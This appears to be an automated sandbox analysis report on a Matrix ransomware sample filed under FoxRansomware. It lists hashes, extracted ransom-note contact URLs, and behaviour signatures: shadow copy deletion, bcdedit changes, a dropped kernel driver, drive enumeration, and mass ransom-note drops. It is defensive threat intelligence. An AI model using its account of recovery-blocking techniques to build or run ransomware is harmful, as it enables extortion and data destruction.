Overview
overview
10Static
static
3FoxRansomw...65.exe
windows7-x64
10FoxRansomw...65.exe
windows10-2004-x64
10FoxRansomw...a7.exe
windows7-x64
10FoxRansomw...a7.exe
windows10-2004-x64
10FoxRansomw...20.exe
windows7-x64
10FoxRansomw...20.exe
windows10-2004-x64
10FoxRansomw...0b.exe
windows7-x64
10FoxRansomw...0b.exe
windows10-2004-x64
10FoxRansomw...53.exe
windows7-x64
10FoxRansomw...53.exe
windows10-2004-x64
10FoxRansomw...b1.exe
windows7-x64
10FoxRansomw...b1.exe
windows10-2004-x64
10Resubmissions
03-04-2024 17:37
240403-v68g6sga2w 10Analysis
-
max time kernel
150s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240319-en -
resource tags
arch:x64arch:x86image:win7-20240319-enlocale:en-usos:windows7-x64system -
submitted
03-04-2024 17:37
Static task
static1
Behavioral task
behavioral1
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win7-20240319-en
Behavioral task
behavioral8
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral11
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win7-20240221-en
Behavioral task
behavioral12
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win10v2004-20240226-en
General
-
Target
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
-
Size
1.2MB
-
MD5
907636b28d162f7110b067a8178fa38c
-
SHA1
048ae4691fe267e7c8d9eda5361663593747142a
-
SHA256
6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b
-
SHA512
501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a
-
SSDEEP
24576:R/SA+2lraRrjSJR5ezmT1dM9tZBb5t+wb8fq/81mkvfW:3XlayIsy81hvf
Malware Config
Extracted
http://myexternalip.com/raw
Extracted
C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\#CORE_README#.rtf
https://bitmsg.me
https://bitmsg.me/users/sign_up
https://bitmsg.me/users/sign_in
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description ioc Process File created C:\Users\All Users\Package Cache\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\packages\Patch\x64\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Templates\1033\FAX\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\locale\ie\LC_MESSAGES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Users\All Users\Microsoft\Assistance\Client\1.0\de-DE\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Users\All Users\Microsoft\Assistance\Client\1.0\ja-JP\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Users\Public\Libraries\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Mozilla Firefox\browser\VisualElements\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SoftBlue\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jre7\lib\deploy\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\locale\sm\LC_MESSAGES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\DocumentShare\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jre7\lib\amd64\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\STS2\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\plugins\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMV12\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jdk1.7.0_80\db\lib\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\1033\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\locale\tt\LC_MESSAGES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Discussion\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\PROOF\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Mozilla Firefox\uninstall\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 4840 bcdedit.exe 4860 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 7 2944 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS sVnphR8S64.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" sVnphR8S64.exe -
Executes dropped EXE 3 IoCs
pid Process 2284 NWqTHZCI.exe 3660 sVnphR8S.exe 3860 sVnphR8S64.exe -
Loads dropped DLL 4 IoCs
pid Process 2888 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe 2888 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe 1404 cmd.exe 3660 sVnphR8S.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 3232 takeown.exe -
resource yara_rule behavioral7/files/0x00060000000160a8-1820.dat upx behavioral7/memory/3660-1926-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/3660-10271-0x0000000000400000-0x0000000000477000-memory.dmp upx -
Enumerates connected drives 3 TTPs 44 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\X: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\I: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\E: sVnphR8S64.exe File opened (read-only) \??\G: sVnphR8S64.exe File opened (read-only) \??\Z: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\Y: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\I: sVnphR8S64.exe File opened (read-only) \??\P: sVnphR8S64.exe File opened (read-only) \??\Q: sVnphR8S64.exe File opened (read-only) \??\U: sVnphR8S64.exe File opened (read-only) \??\T: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\S: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\O: sVnphR8S64.exe File opened (read-only) \??\Y: sVnphR8S64.exe File opened (read-only) \??\K: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\B: sVnphR8S64.exe File opened (read-only) \??\J: sVnphR8S64.exe File opened (read-only) \??\K: sVnphR8S64.exe File opened (read-only) \??\Q: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\G: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\O: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\L: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\H: sVnphR8S64.exe File opened (read-only) \??\N: sVnphR8S64.exe File opened (read-only) \??\V: sVnphR8S64.exe File opened (read-only) \??\V: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\P: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\L: sVnphR8S64.exe File opened (read-only) \??\T: sVnphR8S64.exe File opened (read-only) \??\W: sVnphR8S64.exe File opened (read-only) \??\M: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\J: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\M: sVnphR8S64.exe File opened (read-only) \??\S: sVnphR8S64.exe File opened (read-only) \??\N: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\E: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\R: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\H: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\A: sVnphR8S64.exe File opened (read-only) \??\R: sVnphR8S64.exe File opened (read-only) \??\X: sVnphR8S64.exe File opened (read-only) \??\Z: sVnphR8S64.exe File opened (read-only) \??\W: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\U: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 myexternalip.com -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\JcMQhiK9.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yakutat 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME45.CSS 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Extensions\external_extensions.json 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\menu_style_default_Thumbnail.png 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-spi-actions.jar 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198372.WMF 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nome 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.concurrent_1.1.0.v20130327-1442.jar 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macHandle.png 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313965.JPG 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Faroe 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.SYX 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Asuncion 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240389.profile.gz 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_ja.jar 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Shanghai 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Choibalsan 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jre7\README.txt 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN00965_.WMF 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multiview.xml 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-io-ui.xml 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\vlc.mo 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\OFFICE10.MMW 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GRAPH_K_COL.HXK 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\GMT 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\button-overlay.png 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Panama 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\button_left.gif 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BROCHURE.XML 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\BREAK.JPG 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00918_.WMF 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18254_.WMF 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BabyBlue\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft.NET\RedistList\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Syowa 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\vlc.mo 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0295069.WMF 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04191_.WMF 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans_1.2.200.v20140214-0004.jar 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Slate\TAB_OFF.GIF 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Part\2 Top.accdt 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\Hardware Tracker.fdt 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-filesystems.xml 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\launcher.win32.win32.x86_64.properties 